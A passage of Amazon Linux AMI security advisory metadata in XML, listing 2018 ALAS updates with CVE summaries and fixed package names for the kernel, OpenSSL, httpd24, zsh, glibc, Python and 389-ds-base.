epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.91-1.34.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1100</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1100: important priority package update for kernel</title><issued date="2018-11-05 19:47:00" /><updated date="2018-11-08 00:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-18021:
A vulnerability was discovered in the Linux kernel that allows an attacker to escalate privileges with using a 64-bit ARM architecture. A local attacker with permission to create KVM-based virtual machines can both panic the hypervisor by triggering an illegal exception return (resulting in a DoS) and to redirect execution elsewhere within the hypervisor with full register control, instead of causing a return to the guest.
1635475:
CVE-2018-18021 kernel: Privilege escalation on arm64 via KVM hypervisor
CVE-2018-17972:
An issue was discovered in the proc_pid_stack function in fs/proc/base.c in the Linux kernel. An attacker with a local account can trick the stack unwinder code to leak stack contents to userspace. The fix allows only root to inspect the kernel stack of an arbitrary task.
1636349:
CVE-2018-17972 kernel: Unprivileged users able to inspect kernel stacks of arbitrary tasks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17972" title="" id="CVE-2018-17972" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18021" title="" id="CVE-2018-18021" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1101</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1101: medium priority package update for python35</title><issued date="2018-11-05 21:47:00" /><updated date="2018-11-08 01:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14647:
Python&#039;s elementtree C accelerator failed to initialise Expat&#039;s hash salt during initialization. This could make it easy to conduct denial of service attacks against Expat by contructing an XML document that would cause pathological hash collisions in Expat&#039;s internal data structures, consuming large amounts CPU and RAM.
1631822:
CVE-2018-14647 python: Missing salt initialization in _elementtree.c module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14647" title="" id="CVE-2018-14647" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-debuginfo" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.6-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1102</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1102: medium priority package update for openssl</title><issued date="2018-12-05 23:20:00" /><updated date="2018-12-07 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
CVE-2018-0495:
Libgcrypt before 1.7.10 and 1.8.x before 1.8.3 allows a memory-cache side-channel attack on ECDSA signatures that can be mitigated through the use of blinding during the signing process in the _gcry_ecc_ecdsa_sign function in cipher/ecc-ecdsa.c, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.
1591163:
CVE-2018-0495 openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries
CVE-2017-3735:
While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.
1486144:
CVE-2017-3735 openssl: Malformed X.509 IPAdressFamily could cause OOB read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3735" title="" id="CVE-2017-3735" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0495" title="" id="CVE-2018-0495" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.146.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1104</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1104: medium priority package update for httpd24</title><issued date="2018-12-13 17:29:00" /><updated date="2018-12-14 01:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11763:
In Apache HTTP Server 2.4.17 to 2.4.34, by sending continuous, large SETTINGS frames a client can occupy a connection, server thread and CPU time without any connection timeout coming to effect. This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.
1633399:
CVE-2018-11763 httpd: DoS for HTTP/2 connections by continuous SETTINGS frames
1633399:
CVE-2018-11763 httpd: DoS for HTTP/2 connections by continuous SETTINGS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11763" title="" id="CVE-2018-11763" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-tools" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.37" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.37-1.83.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.37" release="1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.37" release="1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.37" release="1.83.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.37" release="1.83.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.37-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1106</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1106: medium priority package update for 389-ds-base</title><issued date="2018-12-06 00:18:00" /><updated date="2018-12-07 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14648:
It was found that a specially crafted search query could lead to excessive CPU consumption in the do_search() function. An unauthenticated attacker could use this flaw to provoke a denial of service.
1630668:
CVE-2018-14648 389-ds-base: Mishandled search requests in servers/slapd/search.c:do_search() allows for denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14648" title="" id="CVE-2018-14648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-debuginfo" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.8.4-18.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1107</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1107: medium priority package update for zsh</title><issued date="2018-12-06 00:20:00" /><updated date="2018-12-07 00:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7549:
In params.c in zsh through 5.4.2, there is a crash during a copy of an empty hash table, as demonstrated by typeset -p.
A NULL pointer dereference flaw was found in the code responsible for saving hashtables of the zsh package. An attacker could use this flaw to cause a denial of service by crashing the user shell.
1549858:
CVE-2018-7549 zsh: crash on copying empty hash table
CVE-2018-1100:
A buffer overflow flaw was found in the zsh shell check path functionality. A local, unprivileged user can create a specially crafted message file, which, if used to set a custom &quot;you have new mail&quot; message, leads to code execution in the context of the user who receives the message. If the user affected is privileged, this leads to privilege escalation.
1563395:
CVE-2018-1100 zsh: buffer overflow in utils.c:checkmailpath() can lead to local arbitrary code execution
CVE-2018-1083:
A buffer overflow flaw was found in the zsh shell auto-complete functionality. A local, unprivileged user can create a specially crafted directory path which leads to code execution in the context of the user who tries to use auto-complete to traverse the before mentioned path. If the user affected is privileged, this leads to privilege escalation.
1557382:
CVE-2018-1083 zsh: Stack-based buffer overflow in gen_matches_files() at compctl.c
CVE-2018-1071:
zsh through version 5.4.2 is vulnerable to a stack-based buffer overflow in the exec.c:hashcmd() function. A local attacker could exploit this to cause a denial of service.
1553531:
CVE-2018-1071 zsh: Stack-based buffer overflow in exec.c:hashcmd()
CVE-2017-18206:
In utils.c in zsh before 5.4, symlink expansion had a buffer overflow.
A buffer overflow flaw was found in the zsh shell symbolic link resolver. A local, unprivileged user can create a specially crafted directory path which leads to a buffer overflow in the context of the user trying to do a symbolic link resolution in the aforementioned path. If the user affected is privileged, this leads to privilege escalation.
1549861:
CVE-2017-18206 zsh: buffer overrun in xsymlinks
1549861:
CVE-2017-18206 zsh: buffer overrun in symlinks
CVE-2017-18205:
In builtin.c in zsh before 5.4, when sh compatibility mode is used, there is a NULL pointer dereference during processing of the cd command with no argument if HOME is not set.
A NULL pointer dereference flaw was found in the code responsible for the cd builtin command of the zsh package. An attacker could use this flaw to cause a denial of service by crashing the user shell.
1549862:
CVE-2017-18205 zsh: NULL dereference in cd in sh compatibility mode under given circumstances
CVE-2014-10072:
A buffer overflow flaw was found in the zsh shell symbolic link resolver. A local, unprivileged user can create a specially crafted directory path which leads to a buffer overflow in the context of the user trying to do symbolic link resolution in the aforementioned path. An attacker could exploit this vulnerability to cause a denial of service condition on the target.
1549836:
CVE-2014-10072 zsh: buffer overflow when scanning very long directory paths for symbolic links
CVE-2014-10071:
A buffer overflow flaw was found in the zsh shell file descriptor redirection functionality. An attacker could use this flaw to cause a denial of service by crashing the user shell.
1549855:
CVE-2014-10071 zsh: buffer overflow for very long fds in >& fd syntax
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10071" title="" id="CVE-2014-10071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10072" title="" id="CVE-2014-10072" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18205" title="" id="CVE-2017-18205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18206" title="" id="CVE-2017-18206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1071" title="" id="CVE-2018-1071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1083" title="" id="CVE-2018-1083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1100" title="" id="CVE-2018-1100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7549" title="" id="CVE-2018-7549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="zsh" version="5.0.2" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-5.0.2-31.17.amzn1.x86_64.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-debuginfo-5.0.2-31.17.amzn1.x86_64.rpm</filename></package><package name="zsh-html" version="5.0.2" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-html-5.0.2-31.17.amzn1.x86_64.rpm</filename></package><package name="zsh" version="5.0.2" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-5.0.2-31.17.amzn1.i686.rpm</filename></package><package name="zsh-html" version="5.0.2" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-html-5.0.2-31.17.amzn1.i686.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-debuginfo-5.0.2-31.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1108</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1108: medium priority package update for python27</title><issued date="2018-12-06 00:22:00" /><updated date="2018-12-07 00:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1061:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.
1549192:
CVE-2018-1061 python: DOS via regular expression backtracking in difflib.IS_LINE_JUNK method in difflib
CVE-2018-1060:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s pop3lib&#039;s apop() method. An attacker could use this flaw to cause denial of service.
1549191:
CVE-2018-1060 python: DOS via regular expression catastrophic backtracking in apop() method in pop3lib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1060" title="" id="CVE-2018-1060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1061" title="" id="CVE-2018-1061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.15" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.15-1.124.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.15-1.124.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.15" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.15-1.124.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1109</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1109: medium priority package update for glibc</title><issued date="2018-12-06 00:24:00" /><updated date="2018-12-07 00:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6485:
An integer overflow in the implementation of the posix_memalign in memalign functions in the GNU C Library (aka glibc or libc6) 2.26 and earlier could cause these functions to return a pointer to a heap area that is too small, potentially leading to heap corruption.
1542102:
CVE-2018-6485 glibc: Integer overflow in posix_memalign in memalign functions
CVE-2018-11237:
A buffer overflow has been discovered in the GNU C Library (aka glibc or libc6) in the __mempcpy_avx512_no_vzeroupper function when particular conditions are met. An attacker could use this vulnerability to cause a denial of service or potentially execute code.
1581274:
CVE-2018-11237 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper
CVE-2018-11236:
stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.
1581269:
CVE-2018-11236 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow
CVE-2017-16997:
elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretion of an empty RPATH/RUNPATH token as the &quot;./&quot; directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution.
1526865:
CVE-2017-16997 glibc: Incorrect handling of RPATH in elf/dl-load.c can be used to execute code loaded from arbitrary libraries
